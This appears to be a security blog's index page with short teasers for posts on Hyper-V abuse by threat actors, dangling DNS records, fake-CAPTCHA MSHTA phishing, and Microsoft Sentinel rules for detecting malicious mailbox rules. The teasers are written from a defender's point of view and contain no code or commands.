Skip to content

Blog

  • 1 min read

The Virtualized Threat: Malicious actors exploiting native Hyper-V virtualization features to conduct covert operations

Threat actor groups such as Akira Ransomware, Curly COMrades, and UNC3886 have been observed abusing native Windows Hyper-V virtualization features to create hidden Virtual Machines (VM), establishing covert, long term operations that include the adversary performing internal reconnaissance, deploying malware implants and proxying network activity whilst evading host-centric monitoring tools.

Organizations that aren’t auditing virtualized endpoints and that don’t have tailored endpoint detections alongside network observability may be at risk.

This blog post will examine the methods used by these malicious actors to abuse native virtualization features and detection strategies organizations can implement against these attacks.

...Read the full post on SRA's Blog...

https://sra.io/blog/the-virtualized-threat-malicious-actors-exploiting-native-hyper-v-virtualization-features-to-conduct-covert-operations/

  • 1 min read

Clean Up Your DNS Records Before We Get Ants (or Hacked)

Just as you would clean up your dishes after a meal and put food away to prevent getting ants in the kitchen, organizations should be cleaning up their DNS records.

ants on server

This accompanied by proactive auditing processes to ensure an organization’s DNS records are maintained can mitigate the potential of (sub)domain takeovers caused by dangling DNS records.

When DNS records are left unmanaged, malicious actors can use an organization’s reputation and trusted domains for nefarious purposes.

...Read the full post on SRA's Blog...

https://sra.io/blog/clean-up-your-dns-records-before-we-get-ants-or-hacked/

  • 5 min read

The recent resurgence of malicious MSHTA activity.

Noticing a resurgence in phishing campaigns using fake CAPTCHA verification pages to distribute malware through abused mshta.exe commands. These attacks are leading to bypassed security controls and adversaries stealing sensitive data through infostealers like Lumma and Vidar stealer.

  • 4 min read

Sentinel basics

Thought I may as well begin to share some Microsoft Sentinel Basics I have learnt over the last few months amongst other studies that I am currently completing.

This article is about Analytic Rules and creating a basic rule to alert on the creation of Malicious mailbox rules within an environment. Attackers use compromised accounts to create mailbox rules, a simple process that enables the attackers to maintain a quiet persistent access to the mailbox - they can use this for a whole variety of malicious purposes.